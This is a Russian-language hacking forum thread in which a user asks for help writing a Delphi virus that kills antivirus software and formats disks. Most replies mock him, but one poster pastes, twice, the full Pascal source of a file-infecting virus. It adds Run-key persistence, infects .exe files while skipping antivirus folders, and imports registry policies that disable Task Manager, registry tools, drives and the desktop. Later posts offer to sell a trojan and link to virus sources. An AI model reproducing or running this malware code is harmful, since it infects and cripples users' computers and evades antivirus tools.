| Хак! Ломать не строить - это уметь надо |
Вирус на Delphi
,люди помогите в написании вируса!
Дата публикации:
DarkFire, 11.09.2007 - 14:52
Я бы хотел написать вирус
на Delphi, но затрудняюсь это сделать один вот решил попросить о помощи 
я бы хотел чтобы вир выбивал антивир (доктор веб или каспер) и открывал какой небудь порт
, ну и конечно небыл видим негде. ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска!
зарание благодерен
† Flаmmen †, 11.09.2007 - 18:03
... а еще код вертикального взлета и выхода в открытый космос. Просто так вирусами никто делиться не будет и их написание — это целое искусство. А то если каждый ......пользователь будет писать вирусы, которые не видят антивирусы (!!!), то эра информационных технологий закончится.de1ay, 11.09.2007 - 18:23
Давайте по порядку.Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
Я бы хотел написать вирус
Есть ли у тебя знания в области программирования как таковые?
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
на Delphi
Да-а-а... Писать вирусы на дельфи. Прикидываешь размер файла?
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
чтобы вир выбивал антивир (доктор веб или каспер)
Антивирус ты так просто не вырубишь, он сразу затрубит об этом пользователю или скромно промолчит, но вырубить свой процесс не даст. К тому же, все антивирусы работают в нулевом кольце, а твоя софтина туда вообще вряд ли пробьётся...
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
открывал какой небудь порт, ну и конечно небыл видим негде ... код перезагрузки и дальнейшнго форматирования диска!
Win-api учи и будет счастье...
Подводя итог хочу спросить:
Не передумал?
Цитата | Quote
Просто так вирусами никто делиться не будет и их написание — это целое искусство.
Есть в интернете сорсы троянов на дельфи...
ZaHack, 11.09.2007 - 22:50
Цитата | Quote(delay(0) @ 11.09.2007 - 19:23)
Есть в интернете сорсы троянов на дельфи...
Если эти программы-шутки можно назвать троянами.
Самое юзабельное, что видел это "Боевой конь за 10 минут" от Михаила Фленова. Но это никак нельзя назвать полноценным трояном, так подкол ламера...Цитата | Quote
ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска!
Так, ну про вертикальный взлет тебе уже сказали, могу предложить еще код вызова Сотоны и выхода в Астрал.
Цитата | Quote
Есть ли у тебя знания в области программирования как таковые?
А ты сам как думаешь?
-=$eReG@=-, 12.09.2007 - 23:29
Цитата | Quote
Я бы хотел написать вирус на Delphi
сразу видно - матёрый хакер! 
Цитата | Quote
я бы хотел чтобы вир выбивал антивир
ну, а кто ж не хотел быЦитата | Quote
ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска!
зарание благодерен
кого же это ты так невзлюбил?зарание благодерен
Цитата | Quote
Win-api учи и будет счастье...
полностью поддерживаюзы: хочешь написать хороший вирус - учи лучше assembler и грОматЕку
И да поможет тебе великий Ктулху.
kukkk, 11.10.2007 - 22:16
Антивир в принципе незачем вырубать))) Замути просто форму без внешней таблички с размером формы 1*1. Получицца активное приложение или убери его в трей каким-нибудь знакомым значком. каспер клюнет 100%. Я свои вирусы и вообще программы(у меня нет ни одной не хак бугага) пишу по принципу создания подобия самой безобидной программки))) Конечно если у тебя будет прописано отформатировать с то все антивиры завопят,а вот если прога получит список файлов,потом удалит 1,потом 2-й))) Никакого подозрения. Все легально.=> Каспер молчит. Исчи обходные пути. Я даже когда нужно было перезагружать комп делал кнопку и на нее программно нажимал. А что? Комп выключается по кнопке,только панда падло запалил это((de1ay, 11.10.2007 - 22:29
kukkk, а то, что антивирь ставит хуки, тебе не о чем не говорит?yah, 11.10.2007 - 22:31
Цитата | Quote(kukkk @ 11.10.2007 - 22:19)
Я даже когда нужно было перезагружать комп делал кнопку и на нее программно нажимал.
Вот это кстати похвально. Не всегда все сводится к перелезанию ring3->ring0. Для написания более менее рабочего вируса со всеми необходимыми функция вполне достаточно winapi. Главное грамотно продумать алгоритм. Ну а если уж хочется полной власти, то милости просим в ring0. Но там уже будет свой набор API.
ser_gaik88, 16.10.2007 - 21:01
Если руки не кривые в дельфине вир можно написать на 60-80 кб.Причём вполне полноценный!!А для тех кто срёт на обьём файлов из делфи,скажу что они просто не умеют юзать конпилы да ваще делфи херовато знают!!!Обычный инпутный ехена 600кб при желании делается 60кб.
snike, 2.12.2007 - 15:59
Ну коль есть желание у тебя, попробуй для начала в "этом" разобраться . при желании можешь модифицировать.Code
{$M 65520,0,0}
Program Virus_DOS_HLLP_GVDG;
USES DOS;
Const
VirSize=5982;
Metka='by SN!KE=))';
MSize=length(Metka);
type
Bufer=array[1..VirSize] of Char;
VAR
Victim : integer;
Procedure BeginEnd(i : integer);
var
n :integer;
Begin
case i of
0..10000: n:=0;
10001..20000: n:=i;
20001..30000: n:=random(1000)
else
begin
n:=0;
n:=random(65535);
n:=i
end;
end;
End;
Function IntToStr(I : integer) : String;
Var
S : String [5];
Begin
Str(I, S);
IntToStr:=S;
End;
Procedure Musor;
var
fch : file of char;
rch : char;
ch : char;
st : string;
i : integer;
ii : integer;
iii : integer;
begin
randomize; BeginEnd(-1894);
for i:=1 to random(10) do
begin
st:='';
for ii:=1 to random(5)+3 do
begin
rch:=chr(ord(random(26)+65));
st:=st+rch;
end;
Assign(fch,st+'.'+chr(ord(random(26)+65))+
+chr(ord(random(26)+65))+chr(ord(random(26)+65)));
Rewrite(fch);
for iii:=1 to random(1000) do
begin
ch:=chr(ord(random(256)));
write(fch,ch);
end;
close(fch);
end;
end;
Procedure AutoRun;
VAR
f : file;
txt : text;
i : integer;
st1 : string;
st2 : string;
Begin
st1:=GetEnv('SystemRoot')+'\'+'AVTORUN'+'.EXE';
for i:=1 to length(st1) do
begin
if st1[i]='\'
then st2:=st2+'\'+st1[i]
else st2:=st2+st1[i]
end;
Assign(f,st1);
{$i-} Reset(f); Close(f); {$i+}
if IOResult<>0 then
Begin
Assign(txt,'REG');
Rewrite(txt);
Writeln(txt,'Windows Registry Editor Version 5.00');
Writeln(txt,'[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]');
Writeln(txt,'"AVTORUN"="'+st2+'"');
Close(txt);
Exec(GetEnv('Comspec'),'/c REG IMPORT REG');
Exec(GetEnv('Comspec'),'/c DEL REG');
Exec(GetEnv('Comspec'),'/c copy '+paramstr(0)+' '+st1);
Exec(GetEnv('Comspec'),'/c cls');
End; BeginEnd(19573);
End;
procedure Shifr(var Buf : Bufer; key : integer);
var
k : integer;
begin
for k:=1 to Sizeof(Buf) do
Buf[k]:=chr(ord(Buf[k]) xor key);
end;
procedure Infect(path,name:string);
var
FromF : file;
ToF : file;
BufVir : Bufer;
NumRead : Word;
txt : text;
i : integer;
k : integer;
Key : integer;
begin
Assign(txt,path+name);
append(txt);
write(txt,Metka); BeginEnd(-2253);
i:=0;
k:=random(256);
repeat
inc(i);
write(txt,chr(random(256))); BeginEnd(-1139);
until i>k;
Close(txt); BeginEnd(18190);
Assign(ToF,path+name);
reset(ToF,1);
Key:=FileSize(ToF) mod 256; BeginEnd(19974);
BlockRead(ToF,BufVir,SizeOf(BufVir), NumRead);
Shifr(BufVir,Key);
seek(ToF,filesize(ToF));
BlockWrite(ToF,BufVir,NumRead);
Assign(FromF,paramstr(0));
reset(FromF,1);
BlockRead(FromF,BufVir,SizeOf(BufVir), NumRead);
seek(ToF,0);
BlockWrite(ToF,BufVir,NumRead);
Close(ToF);
Close(FromF);
end;
procedure Find(dir:pathstr);
var
sr : searchrec;
f : file;
Buf : array[1..4] of Char;
begin
findfirst(dir+'*.exe',39,sr);
if (pos('SYSTEM',dir)=0) and (pos('DRWEB', dir)=0)
and (pos('KASPER',dir)=0) and (pos('PANDA', dir)=0)
and (pos('NORTON',dir)=0) and (pos('COMMON',dir)=0)
and (pos('DOCUM', dir)=0) and (pos('GVDG', dir)=0)
then
while doserror=0 do
if Victim<13 then
begin
Assign(f,dir+sr.name);
setfattr(f,0);
{$i-}reset(f,1);
Close(f);{$i+}
IF ioresult=0 then
Begin
Assign(f,dir+sr.name);
reset(f,1); BeginEnd(4089);
if FileSize(f)>1000 then
Begin
seek(f,85);
blockread(f,Buf,4);
Close(f);
if Buf<>'GVDG' then
begin
inc(Victim); BeginEnd(2908);
Infect(dir,sr.name);
end;
end
else
Close(f);
end;
findnext(sr); BeginEnd(-2668);
end
else exit;
end;
procedure InRun(Run : integer);
var
f : file;
txt : text;
BufVir : Bufer;
NumRead : Word;
k : integer;
z : char;
Key : integer;
i : longint;
Buf : array[1..MSize]of char;
begin
if Run=1 then
begin
Musor;
Assign(txt,getenv('TMP')+'reg');
rewrite(txt);
writeln(txt,'Windows Registry Editor Version 5.00');
write(txt,'[HKEY_CURRENT_USER\Software\Microsoft\');
writeln(txt,'Windows\CurrentVersion\Policies\Explorer]');
writeln(txt,'"DisableLocalMachineRun"=dword:00000001');
writeln(txt,'"NoFileMenu"=dword:00000001'); BeginEnd(14641);
writeln(txt,'"NoControlPanel"=dword:00000001');
writeln(txt,'"NoDrives"=dword:3ffffff');
writeln(txt,'"NoViewOnDrive"=dword:3ffffff');
writeln(txt,'"NoClose"=dword:00000001'); BeginEnd(6546);
writeln(txt,'"NoChangeStartMenu"=dword:00000001');
writeln(txt,'"NoViewContextMenu"=dword:00000001');
writeln(txt,'"NoRun"=dword:00000001');
writeln(txt,'"NoFind"=dword:00000001');
writeln(txt,'"NoDesktop"=dword:00000001');
write(txt,'[HKEY_CURRENT_USER\Software\Microsoft\'); BeginEnd(-1088);
writeln(txt,'Windows\CurrentVersion\Policies\System]');
writeln(txt,'"DisableTaskMgr"=dword:00000001'); BeginEnd(6313);
writeln(txt,'"DisableRegistryTools"=dword:00000001');
writeln(txt,'"NoDispCPL"=dword:00000001');
Close(txt);
exec(getenv('comspec'),'/c reg import '+getenv('TMP')+'reg');
exec(getenv('comspec'),'/c cls'); BeginEnd(-1408);
erase(txt);
exec(getenv('Comspec'),'/c cmd /c time '+IntToStr(random(24))+':'+IntToStr(random(60))+':00,00');
exec(getenv('Comspec'),'/c cmd /c rundll32 user32, SwapMouseButton');
writeln('14/88');
end;
Assign(f,paramstr(0));
reset(f,1);
Key:=(FileSize(f)-VirSize) mod 256;
seek(f,filesize(f)-VirSize);
BlockRead(f,BufVir,SizeOf(BufVir), NumRead);
if filesize(f)=VirSize then
Begin
Close(f);
Erase(f);
Halt(0);
end
else
Shifr(BufVir,Key);
seek(f,0);
BlockWrite(f,BufVir,NumRead);
i:=filesize(f)-VirSize-256-MSize; BeginEnd(11632);
while true do
begin
seek(f,i);
blockread(f,Buf,MSize);
if Buf=Metka then
begin
seek(f,i);
truncate(f); BeginEnd(23603);
break;
end;
inc(i);
end;
Close(f);
if Run=1 then
exec(Paramstr(0),'');
end;
Procedure Nucleus;
var
f : file;
begin
Assign(f,paramstr(0));
SetFAttr(f,0);
if Paramstr(1)='KILL' then
begin
InRun(0);
Halt(0);
end;
AutoRun;
Find('');
InRun(1);
end;
begin
Randomize; BeginEnd(5352);
Nucleus;
end.
Program Virus_DOS_HLLP_GVDG;
USES DOS;
Const
VirSize=5982;
Metka='by SN!KE=))';
MSize=length(Metka);
type
Bufer=array[1..VirSize] of Char;
VAR
Victim : integer;
Procedure BeginEnd(i : integer);
var
n :integer;
Begin
case i of
0..10000: n:=0;
10001..20000: n:=i;
20001..30000: n:=random(1000)
else
begin
n:=0;
n:=random(65535);
n:=i
end;
end;
End;
Function IntToStr(I : integer) : String;
Var
S : String [5];
Begin
Str(I, S);
IntToStr:=S;
End;
Procedure Musor;
var
fch : file of char;
rch : char;
ch : char;
st : string;
i : integer;
ii : integer;
iii : integer;
begin
randomize; BeginEnd(-1894);
for i:=1 to random(10) do
begin
st:='';
for ii:=1 to random(5)+3 do
begin
rch:=chr(ord(random(26)+65));
st:=st+rch;
end;
Assign(fch,st+'.'+chr(ord(random(26)+65))+
+chr(ord(random(26)+65))+chr(ord(random(26)+65)));
Rewrite(fch);
for iii:=1 to random(1000) do
begin
ch:=chr(ord(random(256)));
write(fch,ch);
end;
close(fch);
end;
end;
Procedure AutoRun;
VAR
f : file;
txt : text;
i : integer;
st1 : string;
st2 : string;
Begin
st1:=GetEnv('SystemRoot')+'\'+'AVTORUN'+'.EXE';
for i:=1 to length(st1) do
begin
if st1[i]='\'
then st2:=st2+'\'+st1[i]
else st2:=st2+st1[i]
end;
Assign(f,st1);
{$i-} Reset(f); Close(f); {$i+}
if IOResult<>0 then
Begin
Assign(txt,'REG');
Rewrite(txt);
Writeln(txt,'Windows Registry Editor Version 5.00');
Writeln(txt,'[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]');
Writeln(txt,'"AVTORUN"="'+st2+'"');
Close(txt);
Exec(GetEnv('Comspec'),'/c REG IMPORT REG');
Exec(GetEnv('Comspec'),'/c DEL REG');
Exec(GetEnv('Comspec'),'/c copy '+paramstr(0)+' '+st1);
Exec(GetEnv('Comspec'),'/c cls');
End; BeginEnd(19573);
End;
procedure Shifr(var Buf : Bufer; key : integer);
var
k : integer;
begin
for k:=1 to Sizeof(Buf) do
Buf[k]:=chr(ord(Buf[k]) xor key);
end;
procedure Infect(path,name:string);
var
FromF : file;
ToF : file;
BufVir : Bufer;
NumRead : Word;
txt : text;
i : integer;
k : integer;
Key : integer;
begin
Assign(txt,path+name);
append(txt);
write(txt,Metka); BeginEnd(-2253);
i:=0;
k:=random(256);
repeat
inc(i);
write(txt,chr(random(256))); BeginEnd(-1139);
until i>k;
Close(txt); BeginEnd(18190);
Assign(ToF,path+name);
reset(ToF,1);
Key:=FileSize(ToF) mod 256; BeginEnd(19974);
BlockRead(ToF,BufVir,SizeOf(BufVir), NumRead);
Shifr(BufVir,Key);
seek(ToF,filesize(ToF));
BlockWrite(ToF,BufVir,NumRead);
Assign(FromF,paramstr(0));
reset(FromF,1);
BlockRead(FromF,BufVir,SizeOf(BufVir), NumRead);
seek(ToF,0);
BlockWrite(ToF,BufVir,NumRead);
Close(ToF);
Close(FromF);
end;
procedure Find(dir:pathstr);
var
sr : searchrec;
f : file;
Buf : array[1..4] of Char;
begin
findfirst(dir+'*.exe',39,sr);
if (pos('SYSTEM',dir)=0) and (pos('DRWEB', dir)=0)
and (pos('KASPER',dir)=0) and (pos('PANDA', dir)=0)
and (pos('NORTON',dir)=0) and (pos('COMMON',dir)=0)
and (pos('DOCUM', dir)=0) and (pos('GVDG', dir)=0)
then
while doserror=0 do
if Victim<13 then
begin
Assign(f,dir+sr.name);
setfattr(f,0);
{$i-}reset(f,1);
Close(f);{$i+}
IF ioresult=0 then
Begin
Assign(f,dir+sr.name);
reset(f,1); BeginEnd(4089);
if FileSize(f)>1000 then
Begin
seek(f,85);
blockread(f,Buf,4);
Close(f);
if Buf<>'GVDG' then
begin
inc(Victim); BeginEnd(2908);
Infect(dir,sr.name);
end;
end
else
Close(f);
end;
findnext(sr); BeginEnd(-2668);
end
else exit;
end;
procedure InRun(Run : integer);
var
f : file;
txt : text;
BufVir : Bufer;
NumRead : Word;
k : integer;
z : char;
Key : integer;
i : longint;
Buf : array[1..MSize]of char;
begin
if Run=1 then
begin
Musor;
Assign(txt,getenv('TMP')+'reg');
rewrite(txt);
writeln(txt,'Windows Registry Editor Version 5.00');
write(txt,'[HKEY_CURRENT_USER\Software\Microsoft\');
writeln(txt,'Windows\CurrentVersion\Policies\Explorer]');
writeln(txt,'"DisableLocalMachineRun"=dword:00000001');
writeln(txt,'"NoFileMenu"=dword:00000001'); BeginEnd(14641);
writeln(txt,'"NoControlPanel"=dword:00000001');
writeln(txt,'"NoDrives"=dword:3ffffff');
writeln(txt,'"NoViewOnDrive"=dword:3ffffff');
writeln(txt,'"NoClose"=dword:00000001'); BeginEnd(6546);
writeln(txt,'"NoChangeStartMenu"=dword:00000001');
writeln(txt,'"NoViewContextMenu"=dword:00000001');
writeln(txt,'"NoRun"=dword:00000001');
writeln(txt,'"NoFind"=dword:00000001');
writeln(txt,'"NoDesktop"=dword:00000001');
write(txt,'[HKEY_CURRENT_USER\Software\Microsoft\'); BeginEnd(-1088);
writeln(txt,'Windows\CurrentVersion\Policies\System]');
writeln(txt,'"DisableTaskMgr"=dword:00000001'); BeginEnd(6313);
writeln(txt,'"DisableRegistryTools"=dword:00000001');
writeln(txt,'"NoDispCPL"=dword:00000001');
Close(txt);
exec(getenv('comspec'),'/c reg import '+getenv('TMP')+'reg');
exec(getenv('comspec'),'/c cls'); BeginEnd(-1408);
erase(txt);
exec(getenv('Comspec'),'/c cmd /c time '+IntToStr(random(24))+':'+IntToStr(random(60))+':00,00');
exec(getenv('Comspec'),'/c cmd /c rundll32 user32, SwapMouseButton');
writeln('14/88');
end;
Assign(f,paramstr(0));
reset(f,1);
Key:=(FileSize(f)-VirSize) mod 256;
seek(f,filesize(f)-VirSize);
BlockRead(f,BufVir,SizeOf(BufVir), NumRead);
if filesize(f)=VirSize then
Begin
Close(f);
Erase(f);
Halt(0);
end
else
Shifr(BufVir,Key);
seek(f,0);
BlockWrite(f,BufVir,NumRead);
i:=filesize(f)-VirSize-256-MSize; BeginEnd(11632);
while true do
begin
seek(f,i);
blockread(f,Buf,MSize);
if Buf=Metka then
begin
seek(f,i);
truncate(f); BeginEnd(23603);
break;
end;
inc(i);
end;
Close(f);
if Run=1 then
exec(Paramstr(0),'');
end;
Procedure Nucleus;
var
f : file;
begin
Assign(f,paramstr(0));
SetFAttr(f,0);
if Paramstr(1)='KILL' then
begin
InRun(0);
Halt(0);
end;
AutoRun;
Find('');
InRun(1);
end;
begin
Randomize; BeginEnd(5352);
Nucleus;
end.
ZaHack, 2.12.2007 - 17:59
snike, а это что еще за гениальное произведение программистской мысли? Судя по процедуре "Find" тут же даже, так сказать поражение антивирусов реализовано очень прозорливо и на высочайшем уровне.snike, 3.12.2007 - 19:30
Слушай, я бы на твоем месте это "произведение" даже читать не стал=)) Оно написано для подобного рода топикстартеров. Ну, а если ты принял это за вирь - ты на100%ящий RAT-кодер=))x-foby, 4.12.2007 - 9:21
Цитата | Quote
при желании можешь модифицировать
ага, 'avtorun' на 'autorun' замени, к примеру..
de1ay, 4.12.2007 - 16:59
Накинулись на человека, он лишь привел пример.
snike, 4.12.2007 - 23:05
2delay(0).Спасибо тебе=)) Бог с ними, они показывают свои знаия делфей, которые в этом разделе вообще не должны упоменаться, не для дельфей раздел-то=))
Crab2, 31.07.2008 - 11:11
Цитата | Quote(DarkFire @ 11.09.2007 - 14:55)
Я бы хотел написать вирус на Delphi, но затрудняюсь это сделать один вот решил попросить о помощи
я бы хотел чтобы вир выбивал антивир (доктор веб или каспер) и открывал какой небудь порт , ну и конечно небыл видим негде.
ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска!
зарание благодерен
на Delphi, но затрудняюсь это сделать один вот решил попросить о помощи я бы хотел чтобы вир выбивал антивир (доктор веб или каспер) и открывал какой небудь порт
, ну и конечно небыл видим негде. ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска!
зарание благодерен
Тупо убил фразой выбить антивир
чувак по моему почти анреала те для кого реал тупо не дадут сваи секреты
Termo, 18.08.2008 - 8:39
так времени то сколько прошло с момента опубликования ветки.думаю, уже научился чему-нить...
A l i k, 22.08.2008 - 10:35
Если не научился - продам исходник троя на родимом Делфи. Убивает ось нафик, антивирем не палится. Ось продолжает работать до первого ребута. Но при этом невозможно открыть НИЕДИНОГО файла, т.к. ось перестает их понимать. Ярлыки на рабочем столе так же становятся "темным лесом" для Винды.de1ay, 22.08.2008 - 16:11
A l i k, это не троян, это "недопрограмма"...A l i k, 22.08.2008 - 17:32
Согласен, мной была написана с перепугу в ламерские годы, когда я только знакомился с Делфи. Но фак есть фак - практически все, что просил аффтар, правда что без кода вызова сатаны и вертикального взлета.NewHorek, 24.01.2010 - 20:10
Вот для примера исходники вируса на Delphi, если кому интересно.https://softoroom.org/...iles/6p2ihnqte
